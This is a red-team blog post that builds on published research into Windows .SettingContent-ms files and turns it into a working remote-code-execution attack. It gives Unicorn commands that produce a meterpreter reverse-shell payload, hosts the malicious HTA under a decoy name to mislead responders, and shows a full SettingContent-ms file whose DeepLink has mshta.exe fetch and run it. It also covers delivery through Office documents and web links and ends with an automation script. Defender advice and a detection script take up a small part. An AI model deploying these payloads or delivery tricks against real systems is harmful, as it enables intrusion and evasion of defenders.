Weaponizing .SettingContent-ms Extensions for Code Execution

Matt Nelson (@enigma0x3) from SpecterOps recently released a blog post on leveraging a newly discovered file extension with the possibility of command execution. This was a fantastic blog, and as attackers, we typically try to find multiple ways to execute code from different delivery systems. This blog builds on Matt’s research and uses it for code execution on a remote system.

Here are some of the key findings from Matt’s blog post:

  1. Microsoft acknowledged that they probably would not be fixing it.
  2. Works directly from a browser for execution.
  3. Can be embedded into Office documents and can be used for direct execution without Macros.
  4. Can be crafted to bypass Microsoft’s Attack Surface Reduction (ASR): because the Microsoft Office folders are whitelisted, child processes can be spawned from within the Microsoft Office directory.

Many of these are promising because as attackers, we typically try to find new ways of compromising a system without the ability to use traditional methods (such as Macros, HTAs, etc.). Matt did a great job in researching and explaining how he went from Point A to Point Z to get to the place where he was able to circumvent ASR and get command execution.

On a recent engagement, the customer for whom we were doing red team work had some solid detection capabilities, and this blog post was timely for us to use in the wild in a real-world simulation. With other traditional discoveries that go public, such as DDE Auto in the past, attackers weaponize these techniques quickly (https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/). With DDE, we saw attack vectors within 24 hours. Instead of needing to burn zero-day techniques with our customers (with responsible disclosure afterwards), using public techniques that get disclosed is often a good measure of how fast their teams can move to detection (or preventative capabilities).

I decided to take a look at the research and see if I could weaponize it quickly for an engagement. Matt went all the way up to the point of spawning calc.exe (commonly used to demonstrate command/code execution) but didn’t go as far as using this in a weaponized format. The first thing I decided to do was spin up Unicorn (github.com/trustedsec/unicorn) to see if I could get an obfuscated payload to run.

Using Unicorn, I generated a quick meterpreter shell to test and pasted it into Matt’s proof of concept, replacing the cmd.exe with powershell.exe:

git clone https://github.com/trustedsec/unicorn
cd unicorn
python unicorn.py windows/meterpreter/reverse_https 172.16.37.164 443

This will create an obfuscated PowerShell payload and export that as powershell_attacks.txt:

Figure 1 – Obfuscated PowerShell Code

When inserting the long PowerShell string into the .SettingContent-ms file and executing, it appears that the <DeepLink></DeepLink> field errors out:

Figure 2 – Erroring Out Due to Long String

After doing some investigation on the DeepLink field, I noticed that the max character size allowed (including path and everything) is 517 characters. While this is still a great size to play with for our payloads, this means that using large payloads would not be feasible from this attack vector.

There are a number of ways to gain code execution within 517 characters. In the next example, we’ll use a commonly attacked binary with web capabilities called “mshta.exe”. MSHTA is on every supported operating system from Microsoft and has a built-in ability to download and execute HTA files remotely from the command line. We could use a number of other methods, such as the nps_payload (https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/) method, certutil (https://twitter.com/subtee/status/889173356284530688?lang=en), or others. HTAs are easy, and you do not need to specify an actual “hta” extension, which matters because that extension is typically blocked.

Let’s first create our payload with Unicorn, which supports HTAs, and see if we can get code execution.

First, we need to generate our malicious HTA, head to the unicorn directory and type:

python unicorn.py windows/meterpreter/reverse_https 172.16.37.164 443 hta
cp hta_attack/Launcher.hta /var/www/html/LICENSE.txt
service apache2 start

This will generate the appropriate HTA file once Unicorn has completed. Below is a screenshot of running Unicorn:

Figure 3 – Running Unicorn to Generate Our Payload

We then copy the HTA file over and rename it to LICENSE.txt. In most cases, if an incident responder is looking at malicious files, an extension type of .txt or others may throw them off. In addition, if this were a real-world simulation, you would want to use HTTPS and a legitimate, high-reputation (and categorized) domain in order to throw off the blue team.

Lastly, we start Apache in order to host our malicious HTA.

Below is an example of the output from Unicorn of the malicious/obfuscated HTA:

Figure 4 – Output from Unicorn

Next, we create a Test.SettingContent-ms file with our URL to the malicious HTA (LICENSE.txt):

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\mshta.exe http://172.16.37.164/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>

Once we save and double click the file, we now have a shell!

Figure 5 – Successful Shell Access from Meterpreter

Success! Obviously in this example we used Metasploit, but this will work for pretty much any payload you want. MSHTA is only one example of a way to download and execute remotely while staying well within the 517-character restriction. In addition, you can easily embed these into Office documents and ship them off, and as soon as they open, you gain the ability to compromise the computer. You can also host the extension type on a website and coax the user to click on a link. If you want to get crafty, changing things like the icon may help. Below is a simple site with a link to download and execute (just a normal href):

Figure 6 – Simple Site with Link

The “Important Download” link is the hosted SettingContent-ms file. Once opened, it will compromise the system in a similar fashion.

For defenders, the best and easiest course of action is to block the .SettingContent-ms type at the perimeter (to stop the web-based delivery), or to establish an alert whenever one is downloaded or executed. Additionally, consider changing the file association for .SettingContent-ms to Notepad or something else that does not execute the DeepLink command.
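As an added defender-side example (not code from this post or from the auto_settingcontent-ms tool), the following Python script parses a .SettingContent-ms file, pulls out the DeepLink command, and flags the traits described above: a launch of mshta.exe, powershell.exe, cmd.exe or certutil.exe, an embedded URL, or a DeepLink longer than the 517-character limit noted earlier. The XML namespace is the one from the Test.SettingContent-ms file shown above; the two sample documents and the wrap() helper are constructed for this example.

```python
# Triage helper for .SettingContent-ms files (added example, not the post's code).
import re
import xml.etree.ElementTree as ET

NS = {"s": "http://schemas.microsoft.com/Search/2013/SettingContent"}
DEEPLINK_MAX = 517  # maximum DeepLink length observed in the post
# Binaries the post names as able to fetch or run remote content.
WATCHED = {"mshta.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def extract_deeplink(xml_text):
    """Return the DeepLink command string, or None if the element is absent."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    node = ET.fromstring(data).find(".//s:ApplicationInformation/s:DeepLink", NS)
    return node.text.strip() if node is not None and node.text else None


def triage(xml_text):
    """Return the DeepLink plus a list of reasons the file deserves an alert."""
    deeplink = extract_deeplink(xml_text)
    if deeplink is None:
        return {"deeplink": None, "findings": ["no DeepLink element"]}
    findings = []
    # The first whitespace-delimited token is the executable being launched.
    exe = deeplink.split()[0].replace("/", "\\").split("\\")[-1].lower()
    if exe in WATCHED:
        findings.append(f"launches {exe}")
    if URL_RE.search(deeplink):
        findings.append("contains a URL")
    if len(deeplink) > DEEPLINK_MAX:
        findings.append("DeepLink exceeds 517 chars (would not launch)")
    return {"deeplink": deeplink, "findings": findings}


def wrap(deeplink):
    """Build a minimal SettingContent-ms document around a DeepLink (constructed)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?><PCSettings>'
        '<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">'
        "<ApplicationInformation><AppID>x</AppID><DeepLink>" + deeplink + "</DeepLink>"
        "</ApplicationInformation></SearchableContent></PCSettings>"
    )


# Constructed samples: the post's mshta launcher versus a plain control-panel link.
MALICIOUS = wrap(r"%windir%\system32\mshta.exe http://172.16.37.164/LICENSE.txt")
BENIGN = wrap(r"%windir%\system32\control.exe")

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, triage(doc))
```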

If you want a tool to automatically do this for you, I’ve written a quick script called auto_settingcontent-ms.py which creates the Metasploit payload, the HTA, and the Test.SettingContent-ms file for you. This assumes you have Metasploit, Python, and Apache installed already. Note that this is just a quick POC; there are many other methods.

To run it, first git clone auto_settingcontent-ms:

git clone https://github.com/trustedsec/auto_SettingContent-ms
cd auto_SettingContent-ms

Once we have the script, we’ll need to run it and generate our file.

root@stronghold:/home/relik/Desktop/git/auto_settingcontent-ms# python auto_settingcontent-ms.py

This is a simple script that will generate a .SettingContent-ms file which can be used for command/code execution on the system. This file can be hosted inside of an office document, or on a website for the victim to click and gain code execution. This is just a POC and used with Metasploit. You can use whatever you want as far as payload, in this example we are just using windows/meterpreter/reverse_https.


root@stronghold:/home/relik/Desktop/git/auto_settingcontent-ms# python auto_settingcontent-ms.py 
Credit to: Matt Nelson (@enigma0x3) from SpecterOps
Great read here: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
Written by: David Kennedy (@HackingDave, @TrustedSec)
 
Version 0.1
Enter the reverse shell IP address: 192.168.5.5
Enter the port for the reverse shell: 443
Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 0 bytes/s, done.
Resolving deltas: 100% (215/215), done.
Checking connectivity... done.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[*] Exported Test.SettingContent-ms to this folder. Moved over LICENSE.txt (malicious HTA) and setup the SettingContent-ms to point to the Apache server hosting this under /var/www/html
[*] To launch the Metasploit listener, run msfconsole -r unicorn.rc
root@stronghold:/home/relik/Desktop/git/auto_settingcontent-ms#

Download Auto_SettingContent-MS from GitHub

A special thanks to Matt Nelson over at SpecterOps for his great work and examples of gaining code execution abilities through a specific extension type.

References:

Original Post from Matt Nelson on .SettingContent-ms: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

Author: David Kennedy

Security expert, keynote speaker, avid gamer and the go-to for protecting companies from threats.